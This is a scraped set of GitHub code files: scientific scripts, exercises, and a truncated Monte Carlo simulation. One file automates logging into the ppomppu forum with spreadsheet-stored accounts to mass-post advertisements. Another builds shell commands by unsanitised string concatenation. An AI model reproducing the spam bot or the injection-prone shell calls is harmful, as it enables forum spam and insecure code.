parser.add_argument('--persistence',type=float,default=0.0,help=\"persistence parameter. For nonharmonic spectra in L1 and L2 only.\",)\n\n parser.add_argument('--structure_method', type=str,default='')\n parser.add_argument('--feature_list', type=str,default='PH0+PH12+PST0',help='A list of features. '\n 'Multiple features can be input '\n 'Seperated by \"+\" sign '\n 'Available features:'\n '1. PH0 (PH0 feature)'\n '2. PH12 (PH12 features, using statistics on persistent bar'\n '3. PST0 (PST0 features, including harmonic and non-harmonic spectra)'\n '4. PH12_landscape (PH12 features vectorized by Persistent Landscape'\n '5. PST12 (PST12 features for betti numbers, and non-harmonic spectra)' )\n parser.add_argument('--output_path', type=str,\n default='')\n args = parser.parse_args()\n dataset=args.dataset\n a=args.a\n b=args.b\n structure_method=args.structure_method\n\n feature_list=args.feature_list.split('+')\n persistence=args.persistence\n uniprot=dataset_to_uniprot.get(dataset)\n PDBid_list = Uniprot_to_PDB.get(uniprot)\n if structure_method in PDBid_list:\n PDBid=PDBid_list.get(structure_method)\n else:\n PDBid=PDBid_list.get('default')\n Chain = Chain_dir.get(uniprot)\n data = pd.read_csv('data/' + dataset + '/data.csv')\n pH = '7.0'\n for data_id in range(a,b):\n print(data_id)\n MUT=data['mutant'].values[data_id].split(',')\n mutations=[mut[0]+Chain+mut[1:] for mut in MUT]\n y = float(data['log_fitness'].values[data_id])\n num_sites = len(mutations)\n if not structure_method=='':\n data_path=args.output_path+uniprot+'_'+structure_method+'/'\n else:\n data_path=args.output_path+uniprot+'/'\n os.system('mkdir -p '+data_path)\n working_dir = data_path + '_'.join(mutations)+'/'\n if persistence==0.0:\n target_npy=working_dir+'X_PST12mute.npy'\n else:\n target_npy=working_dir+'X_PST12mute'+'_p='+str(persistence)+'.npy'\n if not os.path.exists(target_npy):\n # os.system('rm -r '+working_dir)\n os.system('mkdir -p ' + working_dir)\n print('running on >>>>>>>>>'+ working_dir)\n print(PDBid)\n if structure_method=='NMR':\n MODEL_ID=[]\n for i in range(100):\n pdbfile='structure_data/'+uniprot+'/processed_PDB/'+PDBid+'_m'+str(i)+'.pdb'\n if os.path.exists(pdbfile):\n os.system('cp '+pdbfile+' '+working_dir+PDBid+'_m'+str(i)+'_WT.pdb')\n MODEL_ID.append(i)\n home_dir=os.getcwd()\n os.chdir(working_dir)\n runPST.main_NMR(feature_list,PDBid, Chain, mutations, num_sites, pH, ['WT','MT'],\n max_mut=args.max_mut,site_method=args.site_method,MODEL_ID=MODEL_ID)\n else:\n os.system('cp structure_data/'+uniprot+'/processed_PDB/'+PDBid+'.pdb '+working_dir+PDBid+'_WT.pdb')\n home_dir=os.getcwd()\n os.chdir(working_dir)\n runPST.main(feature_list,PDBid, Chain, mutations, num_sites, pH, ['WT','MT'],\n max_mut=args.max_mut,site_method=args.site_method)\n # os.system('rm *.pdb')\n\n os.chdir(home_dir)\n\n\n\n","repo_name":"YuchiQiu/TopFit","sub_path":"src/PST_embedding.py","file_name":"PST_embedding.py","file_ext":"py","file_size_in_byte":5268,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"4037814049","text":"#!/usr/bin/python3\n\"\"\" function that prints a text with\n 2 new lines after each of these characters: ., ? and :\"\"\"\n\n\ndef text_indentation(text):\n \"\"\" insert doble jump line after . : or ? \"\"\"\n\n characters = [\".\", \"?\", \":\"]\n skip_next = False\n if type(text) != str:\n raise TypeError('text must be a string')\n for letter in text:\n if letter in characters:\n print(letter)\n print()\n skip_next = True\n else:\n if skip_next is False:\n print(letter, end=\"\")\n else:\n if letter != \" \":\n print(letter, end=\"\")\n skip_next = False\n","repo_name":"noemiepham/holbertonschool-higher_level_programming","sub_path":"python-test_driven_development/5-text_indentation.py","file_name":"5-text_indentation.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"14020406827","text":"from selenium import webdriver\nimport time\nimport pyautogui\nimport pyperclip\nfrom selenium.webdriver.common.by import By\nimport chromedriver_autoinstaller\nimport openpyxl\nfrom selenium.webdriver.support.select import Select\nimport pandas as pd\nimport datetime\nimport autoit\n\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument(\"--no-sandbox\")\nchrome_options.add_argument('--disable-dev-shm-usage')\n\nsave_path = \"정보.xlsx\"\nsave_path2 = \"소스만.xlsx\"\n# 기존 파일 불러오기\nwb = openpyxl.load_workbook(save_path, data_only=True)\nwa = openpyxl.load_workbook(save_path2, data_only=True)\nsh = pd.read_excel(\"정보.xlsx\")\n#시트선택\nws = wb.active\nws2 = wa.active\nchromedriver_autoinstaller.install()\n\ndef upload(a, wb=wb,wa=wa):\n url = \"https://www.ppomppu.co.kr/zboard/login.php?r_url=http%3A%2F%2Fwww.ppomppu.co.kr%2Fzboard%2Fzboard.php%3Fid%3Dpmarket3\"\n browser=webdriver.Chrome()\n browser.implicitly_wait(100) # 로딩을 기다릴것 최대 100초\n browser.maximize_window() # 화면 최대화할것\n browser.get(url)\n # 로그인\n id = browser.find_element(by=By.XPATH, value=\"/html/body/div/form/ul/li[1]/input[1]\")\n id.click()\n id.click()\n id.send_keys(ws.cell(row=a,column=1).value)\n\n # 패스워드\n\n pw = browser.find_element(by=By.XPATH, value=\"/html/body/div/form/ul/li[1]/input[2]\")\n pw.click()\n pw.click()\n pw.send_keys(ws.cell(row=a,column=2).value)\n\n # 로그인 버튼 누르기\n log_btn = browser.find_element(by=By.XPATH, value=\"/html/body/div/form/ul/a\")\n log_btn.click()\n time.sleep(2.5)\n\n # 글쓰기\n write_add = browser.find_element(by=By.XPATH, value=\"/html/body/div[6]/div[2]/div[5]/div[1]/table[4]/tbody/tr[2]/td[2]/nobr[2]/a/font\")\n write_add.click()\n time.sleep(2.5)\n\n # 제목\n title = browser.find_element(by=By.XPATH, value=\"/html/body/div[6]/div[2]/div[5]/div/form/table/tbody/tr/td/table[2]/tbody/tr[3]/td/input\")\n title.send_keys(ws.cell(row=a,column=3).value)\n time.sleep(2.5)\n\n #링크\n link = browser.find_element(by=By.XPATH, value=\"/html/body/div[6]/div[2]/div[5]/div/form/table/tbody/tr/td/table[2]/tbody/tr[4]/td/input\")\n link.send_keys(ws.cell(row=a,column=4).value)\n time.sleep(2.5)\n\n # 내용\n edit = browser.find_element(by=By.XPATH, value=\"/html/body/div[6]/div[2]/div[5]/div/form/table/tbody/tr/td/table[2]/tbody/tr[6]/td/div[3]/div[6]/div[2]\")\n edit.click()\n pyperclip.copy(ws2.cell(row=2,column=1).value)\n pyautogui.hotkey(\"ctrl\", \"v\")\n time.sleep(1)\n edit = browser.find_element(by=By.XPATH, value=\"/html/body/div[6]/div[2]/div[5]/div/form/table/tbody/tr/td/table[2]/tbody/tr[6]/td/div[3]/div[6]/div[1]\")\n edit.click()\n time.sleep(2.5)\n\n #분류\n select_element = browser.find_element(by=By.XPATH,value='/html/body/div[6]/div[2]/div[5]/div/form/table/tbody/tr/td/table[2]/tbody/tr[2]/td/span/select')\n select_object = Select(select_element)\n select_object.select_by_visible_text('인터넷')\n\n #이미지 업로드\n ssumnail = browser.find_element(by=By.XPATH,value='/html/body/div[6]/div[2]/div[5]/div/form/table/tbody/tr/td/table[3]/tbody/tr[5]/td/div[2]/span')\n ssumnail.click()\n time.sleep(5)\n\n #Basic Window info 값 handle 변수에 저장\n handle = \"[CLASS:#32770; TITLE:열기]\"\n\n #이름이 '열기'인 창이 나올 때까지 3초간 대기\n autoit.win_wait_active(\"열기\", 3)\n\n img_path = '\"C:\\\\Users\\\\remon\\\\OneDrive\\\\바탕 화면\\\\제품사진.jpg\"'\n\n #사진 클릭시 나오는 윈도우 창에서 파일이름(N)에 이미지 경로값 전달\n autoit.control_send(handle, \"Edit1\", img_path)\n time.sleep(1)\n\n #사진 클릭시 나오는 윈도우 창에서 Button1 클릭\n autoit.control_click(handle, \"Button1\")\n time.sleep(1)\n\n # 이벤트 -> 파일이 다 합쳐진 상태로 왔을 때 처리\n\n # 종료\n #browser.close()\n","repo_name":"remontree/advertisement_automation","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33554484733","text":"__author__ = 'Pavlov_Egor'\nimport random\n\n\ndef get_jokes(list_1, list_2, list_3, flag1=False):\n \"\"\"\n Returns a list of jokes consisting of the elements of the lists.\n The number of jokes is equal to the minimum list.\n :param list_1:\n :param list_2:\n :param list_3:\n :param flag1: By default, words are repeated.\n :return: list\n \"\"\"\n\n if flag1:\n for el in range(min(len(list_1), len(list_2), len(list_3))): # кол-во шуток по самом короткому списку\n pop_el_1 = list_1.pop(list_1.index(random.choice(list_1))) # выбрали случ элемент,получили индекс и попнули\n pop_el_2 = list_2.pop(list_2.index(random.choice(list_2)))\n pop_el_3 = list_3.pop(list_3.index(random.choice(list_3)))\n list_of_jokes.append([pop_el_1, pop_el_2, pop_el_3])\n else:\n for el_1, el_2, el_3 in zip(list_1, list_2, list_3): # а как без el_*?\n list_of_jokes.append([random.choice(list_1), random.choice(list_2), random.choice(list_3)])\n return list_of_jokes\n\n\nnouns = ['автомобиль', 'лес', 'огонь', 'город', 'дом', 'мяч']\nadverbs = ['сегодня', 'вчера', 'завтра', 'позавчера', 'ночью', 'в среду']\nadjectives = ['веселый', 'яркий', 'зеленый', 'утопичный', 'мягкий', 'огромный']\n\nlist_of_jokes = []\nrepetitions = bool(input('Избегать повторы в шутках? Любое значение дает True:'))\nget_jokes(nouns, adverbs, adjectives, flag1=repetitions)\nfor joke in list_of_jokes:\n print(*joke)\n","repo_name":"BadRussianSPb/Python_on_GeekBrains","sub_path":"Pavlov_Egor_Lesson_3/Pavlov_Egor_dz_3_5.py","file_name":"Pavlov_Egor_dz_3_5.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9621718829","text":"# 회의실 배정\n\nn = int(input())\nmeeting = [list(map(int, input().split())) for _ in range(n)]\nmeeting.sort(key=lambda x: (x[1], x[0]))\n\n# 첫 번째는 무조건 고름, 정렬해놨기 때문\nans = 1\nmeeting_end = meeting[0][1]\nfor i in range(1, n):\n if meeting[i][0] >= meeting_end:\n ans += 1\n meeting_end = meeting[i][1]\nprint(ans)","repo_name":"niinp28/algorithm","sub_path":"BOJ/BOJ1931.py","file_name":"BOJ1931.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36804120405","text":"import matplotlib.pyplot as plt\n\n# Definindo variáveis\nfatias = [6, 4, 10]\natividades = ['X', 'Y', 'Z']\ncolunas = ['r', 'm', 'y']\n\n# Criando um gráfico\nplt.pie(fatias, labels = atividades, colors = colunas, startangle = 90, shadow = True, explode = (0.1, 0, 0))\n\nplt.show()","repo_name":"ricdtaveira/poo-python-ifce-p7","sub_path":"aula13/pizza.py","file_name":"pizza.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"41312794347","text":"#Layer3 addressing MAC\nfrom netaddr import *\ndef finding_all_details_of_MAC(addr):\n\n #Instances of the EUI class are used to represent MAC addresses\n mac=EUI(addr)\n\n #methods to provide info on OUI and other organizational info\n print(\"OUI-:\",mac.info)\n oui=mac.oui\n print(\"Organization-:\",oui.registration().org)\n print(\"Registration address\",oui.registration().address)\n\n\n\nif __name__ == \"__main__\":\n addr=input(\"Enter your MAC(Physical addres)-:\")\n finding_all_details_of_MAC(addr)\n #80-32-53-86-08-6B\n ","repo_name":"MOHANRAJ264/PYTHON-NETWORKING","sub_path":"Netaddr_folder/layer3_Mac.py","file_name":"layer3_Mac.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1121437104","text":"import numpy as np\n\nclass AnchorGenerator:\n @property\n def class_name(self):\n raise NotImplementedError\n\n @property\n def num_anchors_per_localization(self):\n raise NotImplementedError\n\n def generate(self, feature_map_size):\n raise NotImplementedError\n\n @property \n def ndim(self):\n raise NotImplementedError\n\n\nclass AnchorGeneratorStride(AnchorGenerator):\n def __init__(self,\n sizes=[1.6, 3.9, 1.56],\n anchor_strides=[0.4, 0.4, 1.0],\n anchor_offsets=[0.2, -39.8, -1.78],\n rotations=[0, np.pi / 2],\n class_name=None,\n match_threshold=-1,\n unmatch_threshold=-1,\n custom_values=(),\n dtype=np.float32):\n super().__init__()\n self._sizes = sizes\n self._anchor_strides = anchor_strides\n self._anchor_offsets = anchor_offsets\n self._rotations = rotations\n self._dtype = dtype\n self._class_name = class_name\n self.match_threshold = match_threshold\n self.unmatch_threshold = unmatch_threshold\n self._custom_values = custom_values\n\n @property\n def class_name(self):\n return self._class_name\n\n @property\n def num_anchors_per_localization(self):\n num_rot = len(self._rotations)\n num_size = np.array(self._sizes).reshape([-1, 3]).shape[0]\n return num_rot * num_size\n\n def create_anchors_3d_stride(self,feature_size,\n sizes=[1.6, 3.9, 1.56],\n anchor_strides=[0.4, 0.4, 0.0],\n anchor_offsets=[0.2, -39.8, -1.78],\n rotations=[0, np.pi / 2],\n dtype=np.float32):\n \"\"\"\n Args:\n feature_size: list [D, H, W](zyx)\n sizes: [N, 3] list of list or array, size of anchors, xyz\n\n Returns:\n anchors: [*feature_size, num_sizes, num_rots, 7] tensor.\n \"\"\"\n # almost 2x faster than v1\n x_stride, y_stride, z_stride = anchor_strides\n x_offset, y_offset, z_offset = anchor_offsets\n z_centers = np.arange(feature_size[0], dtype=dtype)\n y_centers = np.arange(feature_size[1], dtype=dtype)\n x_centers = np.arange(feature_size[2], dtype=dtype)\n z_centers = z_centers * z_stride + z_offset\n y_centers = y_centers * y_stride + y_offset\n x_centers = x_centers * x_stride + x_offset\n sizes = np.reshape(np.array(sizes, dtype=dtype), [-1, 3])\n rotations = np.array(rotations, dtype=dtype)\n rets = np.meshgrid(\n x_centers, y_centers, z_centers, rotations, indexing='ij')\n tile_shape = [1] * 5\n tile_shape[-2] = int(sizes.shape[0])\n for i in range(len(rets)):\n rets[i] = np.tile(rets[i][..., np.newaxis, :], tile_shape)\n rets[i] = rets[i][..., np.newaxis] # for concat\n sizes = np.reshape(sizes, [1, 1, 1, -1, 1, 3])\n tile_size_shape = list(rets[0].shape)\n tile_size_shape[3] = 1\n sizes = np.tile(sizes, tile_size_shape)\n rets.insert(3, sizes)\n ret = np.concatenate(rets, axis=-1)\n return np.transpose(ret, [2, 1, 0, 3, 4, 5])\n def generate(self, feature_map_size):\n res = self.create_anchors_3d_stride(\n feature_map_size, self._sizes, self._anchor_strides,\n self._anchor_offsets, self._rotations, self._dtype)\n if len(self._custom_values) > 0:\n custom_ndim = len(self._custom_values)\n custom = np.zeros([*res.shape[:-1], custom_ndim])\n custom[:] = self._custom_values\n res = np.concatenate([res, custom], axis=-1)\n return res\n\n def generate_anchors(self,feature_map_size):\n ndim = len(feature_map_size)\n anchors = self.generate(feature_map_size)\n anchors = anchors.reshape([*feature_map_size, -1, self.ndim])\n anchors = anchors.transpose(ndim, *range(0, ndim), ndim + 1)\n anchors = anchors.reshape(-1, self.ndim)\n return anchors\n @property \n def ndim(self):\n return 7 + len(self._custom_values)\n\n @property \n def custom_ndim(self):\n return len(self._custom_values)\n","repo_name":"wangguojun2018/PointPillars_Tensorrt","sub_path":"second/core/anchor_generator.py","file_name":"anchor_generator.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"21"} +{"seq_id":"40316942980","text":"import matplotlib.pyplot as plt\nfrom sklearn.manifold import TSNE\nimport seaborn as sns\nfrom sklearn.cluster import KMeans, AgglomerativeClustering\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import silhouette_score\n\nfrom Processing.calculate_spike_rate import calculate_spike_rate_kernel_smoothing\nfrom Processing.process_raw_trace import get_spike_times_for_cc\n\nfrom Visualisation.metrics_plots import plot_metrics_against_clusters\n\n\ndef get_frequency_components(abf_objects):\n freq_components = []\n indexes = [i for i in range(0, 1000, 10)]\n for abf_obj in abf_objects:\n for sweep in range(abf_obj.sweepCount):\n abf_obj.setSweep(sweep)\n spike_times = get_spike_times_for_cc(abf_obj)\n if len(spike_times) > 1:\n kds_data = calculate_spike_rate_kernel_smoothing(spike_times, max(abf_obj.sweepX))\n kds_data = [kds_data[i] for i in indexes]\n freq_components.append(kds_data)\n return freq_components\n\n\ndef calculate_distances_between_categories(tsne_ouput, categories):\n distances = np.zeros(shape=(len(categories), len(categories)))\n same_categories = np.zeros(shape=(len(categories), len(categories)))\n for i, row in enumerate(distances):\n for j, val in enumerate(row):\n if categories[i] == categories[j]:\n same_categories[i, j] = 1\n distances[i, j] = ((tsne_ouput[\"tsne-2d-one\"][i]-tsne_ouput[\"tsne-2d-one\"][j])**2 + (tsne_ouput[\"tsne-2d-two\"][i]-tsne_ouput[\"tsne-2d-two\"][j])**2)**0.5\n distances_between_categories = 0\n distances_between_all = 0\n num_sane_category = 0\n for i, row in enumerate(distances):\n for j, val in enumerate(row):\n if j <= i:\n pass\n else:\n if same_categories[i, j] == 1:\n num_sane_category += 1\n distances_between_categories += val\n distances_between_all += val\n print(f\"Distances between categories = {distances_between_categories/num_sane_category}\")\n total_comparisons = ((len(categories)-1)/(len(categories)*2))*(len(categories)**2)\n print(f\"Distances between all = {distances_between_all/total_comparisons}\")\n\n\ndef tsne_on_full_vector(vectors, neuron_names, labels=None, labels2=None):\n tsne = TSNE(n_components=2, n_iter=1000, perplexity=3)\n for i, vector in enumerate(vectors):\n for j, metric in enumerate(vector):\n if metric is None:\n vectors[i, j] = 0\n tsne_results = tsne.fit_transform(vectors)\n\n tpd = {}\n\n tpd['tsne-2d-one'] = tsne_results[:, 0]\n tpd['tsne-2d-two'] = tsne_results[:, 1]\n plt.figure(figsize=(6, 6))\n\n if labels is not None:\n p1 = sns.scatterplot(\n x=\"tsne-2d-one\", y=\"tsne-2d-two\",\n hue=labels,\n palette=sns.color_palette(\"hls\", len(set(labels))),\n data=tpd,\n legend=True,\n alpha=1\n )\n else:\n p1 = sns.scatterplot(\n x=\"tsne-2d-one\", y=\"tsne-2d-two\",\n data=tpd,\n legend=True,\n alpha=1\n )\n if neuron_names is not None:\n for line in range(len(vectors)):\n p1.text(tpd['tsne-2d-one'][line] + 0.01, tpd['tsne-2d-two'][line],\n neuron_names[line], horizontalalignment='left',\n size='small', color='black', weight='bold')\n plt.show()\n plt.figure(figsize=(6, 6))\n\n if labels2 is not None:\n p1 = sns.scatterplot(\n x=\"tsne-2d-one\", y=\"tsne-2d-two\",\n hue=labels2,\n palette=sns.color_palette(\"hls\", len(set(labels2))),\n data=tpd,\n alpha=1\n )\n plt.legend(bbox_to_anchor=(1.01, 1), borderaxespad=0)\n plt.tight_layout()\n\n plt.show()\n print(\"Original labels\")\n calculate_distances_between_categories(tsne_ouput=tpd, categories=labels)\n print(\"New labels\")\n calculate_distances_between_categories(tsne_ouput=tpd, categories=labels2)\n return tpd\n\n\ndef do_tsne_on_kdfs(kdfs, neuron_names, labels=None):\n tsne = TSNE(n_components=2, n_iter=1000, perplexity=3)\n tsne_results = tsne.fit_transform(kdfs)\n\n tpd = {}\n\n tpd['tsne-2d-one'] = tsne_results[:, 0]\n tpd['tsne-2d-two'] = tsne_results[:, 1]\n plt.figure(figsize=(6, 6))\n plt.title(f\"T-SNE results on KDFs\")\n\n if labels is not None:\n p1 = sns.scatterplot(\n x=\"tsne-2d-one\", y=\"tsne-2d-two\",\n hue=labels,\n palette=sns.color_palette(\"hls\", len(set(labels))),\n data=tpd,\n legend=\"brief\",\n alpha=1\n )\n else:\n p1 = sns.scatterplot(\n x=\"tsne-2d-one\", y=\"tsne-2d-two\",\n data=tpd,\n legend=\"full\",\n alpha=1\n )\n # for line in range(len(kdfs)):\n # p1.text(tpd['tsne-2d-one'][line] + 0.01, tpd['tsne-2d-two'][line],\n # neuron_names[line], horizontalalignment='left',\n # size='small', color='black', weight='bold')\n print(\"KDF labels\")\n calculate_distances_between_categories(tpd, labels)\n plt.show()\n\n\ndef knn_on_ifc_initial(vectors):\n ifc = [vector[1] for vector in vectors]\n finitial = [vector[2] for vector in vectors]\n\n ifc_subset = []\n finitial_subset = []\n labels_full = [None for i in range(len(ifc))]\n for i, ifcc, finit in zip(range(len(ifc)), ifc, finitial):\n if ifcc >= 40:\n labels_full[i] = 3\n else:\n ifc_subset.append(ifcc)\n finitial_subset.append(finit)\n\n # Finidng optimal cluster num\n sil = []\n for i in range(2, 5):\n nbrs = KMeans(n_clusters=i, n_init=20).fit([[f, ifc_v] for f, ifc_v in zip(finitial_subset, ifc_subset)])\n labels_new = nbrs.labels_\n sil.append(silhouette_score([[f, ifc_v] for f, ifc_v in zip(finitial_subset, ifc_subset)], labels_new, metric='euclidean'))\n\n # Doing this number of clusters\n optimal_num = sil.index(min(sil)) + 1\n nbrs = KMeans(n_clusters=optimal_num, n_init=20).fit([[f, ifc_v] for f, ifc_v in zip(finitial_subset, ifc_subset)])\n labels_new = nbrs.labels_\n\n i = 0\n for j, l in enumerate(labels_full):\n if l is None:\n labels_full[j] = labels_new[i]\n i += 1\n else:\n labels_full[j] = max(labels_new) + 1\n return labels_full\n\n\ndef knn_on_strong_weak(response_vectors):\n max_v = [vector[4] for vector in response_vectors]\n mean = [vector[5] for vector in response_vectors]\n B_frac = [vector[3] for vector in response_vectors]\n\n # Finidng optimal cluster num\n sil = []\n for i in range(2, 5):\n nbrs = KMeans(n_clusters=i, n_init=20).fit([[mx, mn, bf] for mx, mn, bf in zip(max_v, mean, B_frac)])\n labels = nbrs.labels_\n sil.append(silhouette_score([[mx, mn, bf] for mx, mn, bf in zip(max_v, mean, B_frac)], labels,\n metric='euclidean'))\n\n # Doing this number of clusters\n optimal_num = sil.index(min(sil)) + 2\n nbrs = KMeans(n_clusters=optimal_num, n_init=20).fit([[mx, mn, bf] for mx, mn, bf in zip(max_v, mean, B_frac)])\n labels = nbrs.labels_\n\n return labels\n\n\ndef knn_on_slow_fast_onset(response_vectors):\n m = [vector[6] for vector in response_vectors]\n tau = [vector[8] for vector in response_vectors]\n c = [vector[7] for vector in response_vectors]\n\n sil = []\n for i in range(2, 5):\n nbrs = KMeans(n_clusters=i, n_init=20).fit([[cc, mm, t] for cc, mm, t in zip(c, m, tau)])\n labels = nbrs.labels_\n sil.append(silhouette_score([[cc, mm, t] for cc, mm, t in zip(c, m, tau)], labels,\n metric='euclidean'))\n\n # Doing this number of clusters\n optimal_num = sil.index(min(sil)) + 2\n nbrs = KMeans(n_clusters=optimal_num, n_init=20).fit([[cc, mm, t] for cc, mm, t in zip(c, m, tau)])\n labels = nbrs.labels_\n\n return labels\n\n\ndef knn_on_slow_fast_adapt_accel(response_vectors):\n B_frac = [vector[3] for vector in response_vectors]\n m = [vector[6] for vector in response_vectors]\n tau = [vector[8] for vector in response_vectors]\n\n sil = []\n for i in range(2, 5):\n nbrs = KMeans(n_clusters=i, n_init=20).fit([[bf, mm, t] for bf, mm, t in zip(B_frac, m, tau)])\n labels = nbrs.labels_\n sil.append(silhouette_score([[bf, mm, t] for bf, mm, t in zip(B_frac, m, tau)], labels,\n metric='euclidean'))\n\n # Doing this number of clusters\n optimal_num = sil.index(min(sil)) + 2\n nbrs = KMeans(n_clusters=optimal_num, n_init=20).fit([[bf, mm, t] for bf, mm, t in zip(B_frac, m, tau)])\n labels = nbrs.labels_\n\n return labels\n\n\ndef knn_full_response_vector(vectors):\n vectors = np.delete(vectors, 0, 1)\n\n sil = []\n for i in range(2, 5):\n nbrs = KMeans(n_clusters=i, n_init=20).fit(vectors)\n labels = nbrs.labels_\n sil.append(silhouette_score(vectors, labels, metric='euclidean'))\n\n # Doing this number of clusters\n optimal_num = sil.index(min(sil))\n nbrs = KMeans(n_clusters=optimal_num, n_init=20).fit(vectors)\n labels = nbrs.labels_\n\n return labels\n\n\ndef agglomerative_clustering_on_vectors(response_vectors):\n ifc = [vector[1] for vector in response_vectors]\n finitial = [vector[2] for vector in response_vectors]\n data = [[fin, ifcc] for fin, ifcc in zip(finitial, ifc)]\n aggl = AgglomerativeClustering(distance_threshold=0, n_clusters=None).fit(data)\n return aggl\n\n\ndef all_clusters(vectors, neuron_names):\n labels1 = knn_on_ifc_initial(vectors)\n plot_metrics_against_clusters(vectors, neuron_names, labels1, \"KNN Adapt-Accel\")\n\n labels2 = knn_on_strong_weak(vectors)\n plot_metrics_against_clusters(vectors, neuron_names, labels2, \"KNN Strong vs Weak\")\n\n labels3 = knn_on_slow_fast_onset(vectors)\n plot_metrics_against_clusters(vectors, neuron_names, labels3, \"KNN Slow vs Fast Onset\")\n\n labels4 = knn_on_slow_fast_adapt_accel(vectors)\n plot_metrics_against_clusters(vectors, neuron_names, labels4, \"KNN Slow vs Fast Adapt-Accel\")\n results = pd.DataFrame([labels1, labels2, labels3, labels4], columns=neuron_names)\n return results\n\n","repo_name":"syorkp/granule_categories","sub_path":"Analysis/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":10235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12201692441","text":"with open('input.txt') as f:\n raw_input = f.read()\n\nlines = [x for x in raw_input.split('\\n') if x != '']\n\ndef part1():\n valid = 0\n for line in lines:\n counts, letter, pw = line.split(' ')\n [min_count, max_count] = [int(x) for x in counts.split('-')]\n letter = letter[0]\n letter_count = pw.count(letter)\n if letter_count >= min_count and letter_count <= max_count:\n valid += 1\n print(valid)\n\ndef part2():\n valid = 0\n for line in lines:\n indices, letter, pw = line.split(' ')\n [i1, i2] = [int(x) for x in indices.split('-')]\n letter = letter[0]\n if (pw[i1-1] == letter) ^ (pw[i2-1] == letter):\n valid += 1\n print(valid)\n\npart1()\npart2()","repo_name":"hairylunch/adventofcode2020","sub_path":"02/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26991971583","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Licensed under the GNU General Public License, version 3.\n# See the file http://www.gnu.org/licenses/gpl.txt\n\nfrom pisi.actionsapi import get, pisitools, shelltools\n\nWorkDir = \".\"\nNoStrip = [\"/\"]\n\ndef install():\n pisitools.dodir (\"/opt/Ferdi\")\n pisitools.insinto(\"/opt/Ferdi\", \"ferdi-5.8.1/*\")\n pisitools.dosym(\"/opt/Ferdi/ferdi\", \"/usr/bin/ferdi\")\n\n \n ","repo_name":"pisilinux/pisilife-2","sub_path":"network/chat/ferdi/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"42842850295","text":"from math import asin, sin, pi\n\ndef snell_descartes(indice_1, indice_2, angulo_incidente):\n ''' retorna o ângulo de refração de um raio de luz\n em graus a partir dos índices de refração dos\n meios e do ângulo de incidência em graus '''\n \n # converte o ângulo de incidência para radianos\n angulo_incidente *= pi / 180\n \n # calcula o seno do ângulo de incidência\n seno_incidente = sin(angulo_incidente)\n \n # calcula o seno do ângulo de refração com base na lei de Snell-Descartes\n seno_refracao = indice_1 / indice_2 * seno_incidente\n \n # calcula o ângulo de refração a partir de seu seno e converte para graus\n angulo_refracao = asin(seno_refracao) * 180 / pi\n \n # retorna o valor do ângulo em graus\n return angulo_refracao\n \n ","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_233/ch117_2020_09_30_20_47_23_494194.py","file_name":"ch117_2020_09_30_20_47_23_494194.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33627940653","text":"# MONTE CARLO TEST WITH HARMONIC OSCILLATOR iN 1D\n\n# The prevuìious code allowd us to test the algorithm and verify the properties\n# of the local kinetic energy with some plots. However, the variational parameter\n# in the WF had to be changed manually. Now, we actually want to automate the \n# variational procedure to find the best value of alpha via a minimisation of the energy\n\nimport time\nimport numpy as np\nfrom numba import njit\nimport math as m\nimport matplotlib.pyplot as plt\nimport random as rd\n\nN_steps = 50000 # Simulation steps\nN_eq = 5000\n\n# Function to compute the WF\n\n@njit \ndef WF(x, alpha):\n \n # We can forget about the normalisation, it comes \"for free\" in MC\n \n Psi = m.exp(- x**2 / (2*alpha**2) ) #* 1 / (2*m.pi*alpha**2)**0.5\n \n return Psi\n\n# FUNCTION FOR THE METROPOLIS ALGORITHM\n\n@njit\ndef metropolis(x, N_acc, wf2_old, Delta, alpha):\n\n # First, we need to build a new configuration\n # We start from the initial one\n\n new_x = x \n\n # Variation of position\n\n rand = rd.uniform(0,1) # Pick random number\n new_x = x - Delta * (rand - 0.5) # Set new coordinate\n\n # Now, we must evaluate the acceptance ratio using the ratio of the square moduli of the WFs\n\n wf2_new = WF(new_x, alpha)**2\n\n acc = wf2_new / wf2_old\n\n # Decide acceptance\n\n xi = rd.uniform(0,1)\n\n wf2 = wf2_old\n\n if xi < acc: # new_part becomes part, we accept the MC move\n\n x = new_x\n\n N_acc += 1 # Increase the number of accepted moves\n\n wf2 = wf2_new\n\n return x, N_acc, wf2\n\n# FUNCTION TO COMPUTE THE POTENTIAL ENERGY \n\n@njit\ndef p_energy(x):\n \n p_en = 0.5 * x**2\n \n return p_en\n\n# FUNCTION TO COMPUTE THE KINETIC ENERGY\n\n@njit\ndef k_energy(x, alpha):\n \n k_en = - 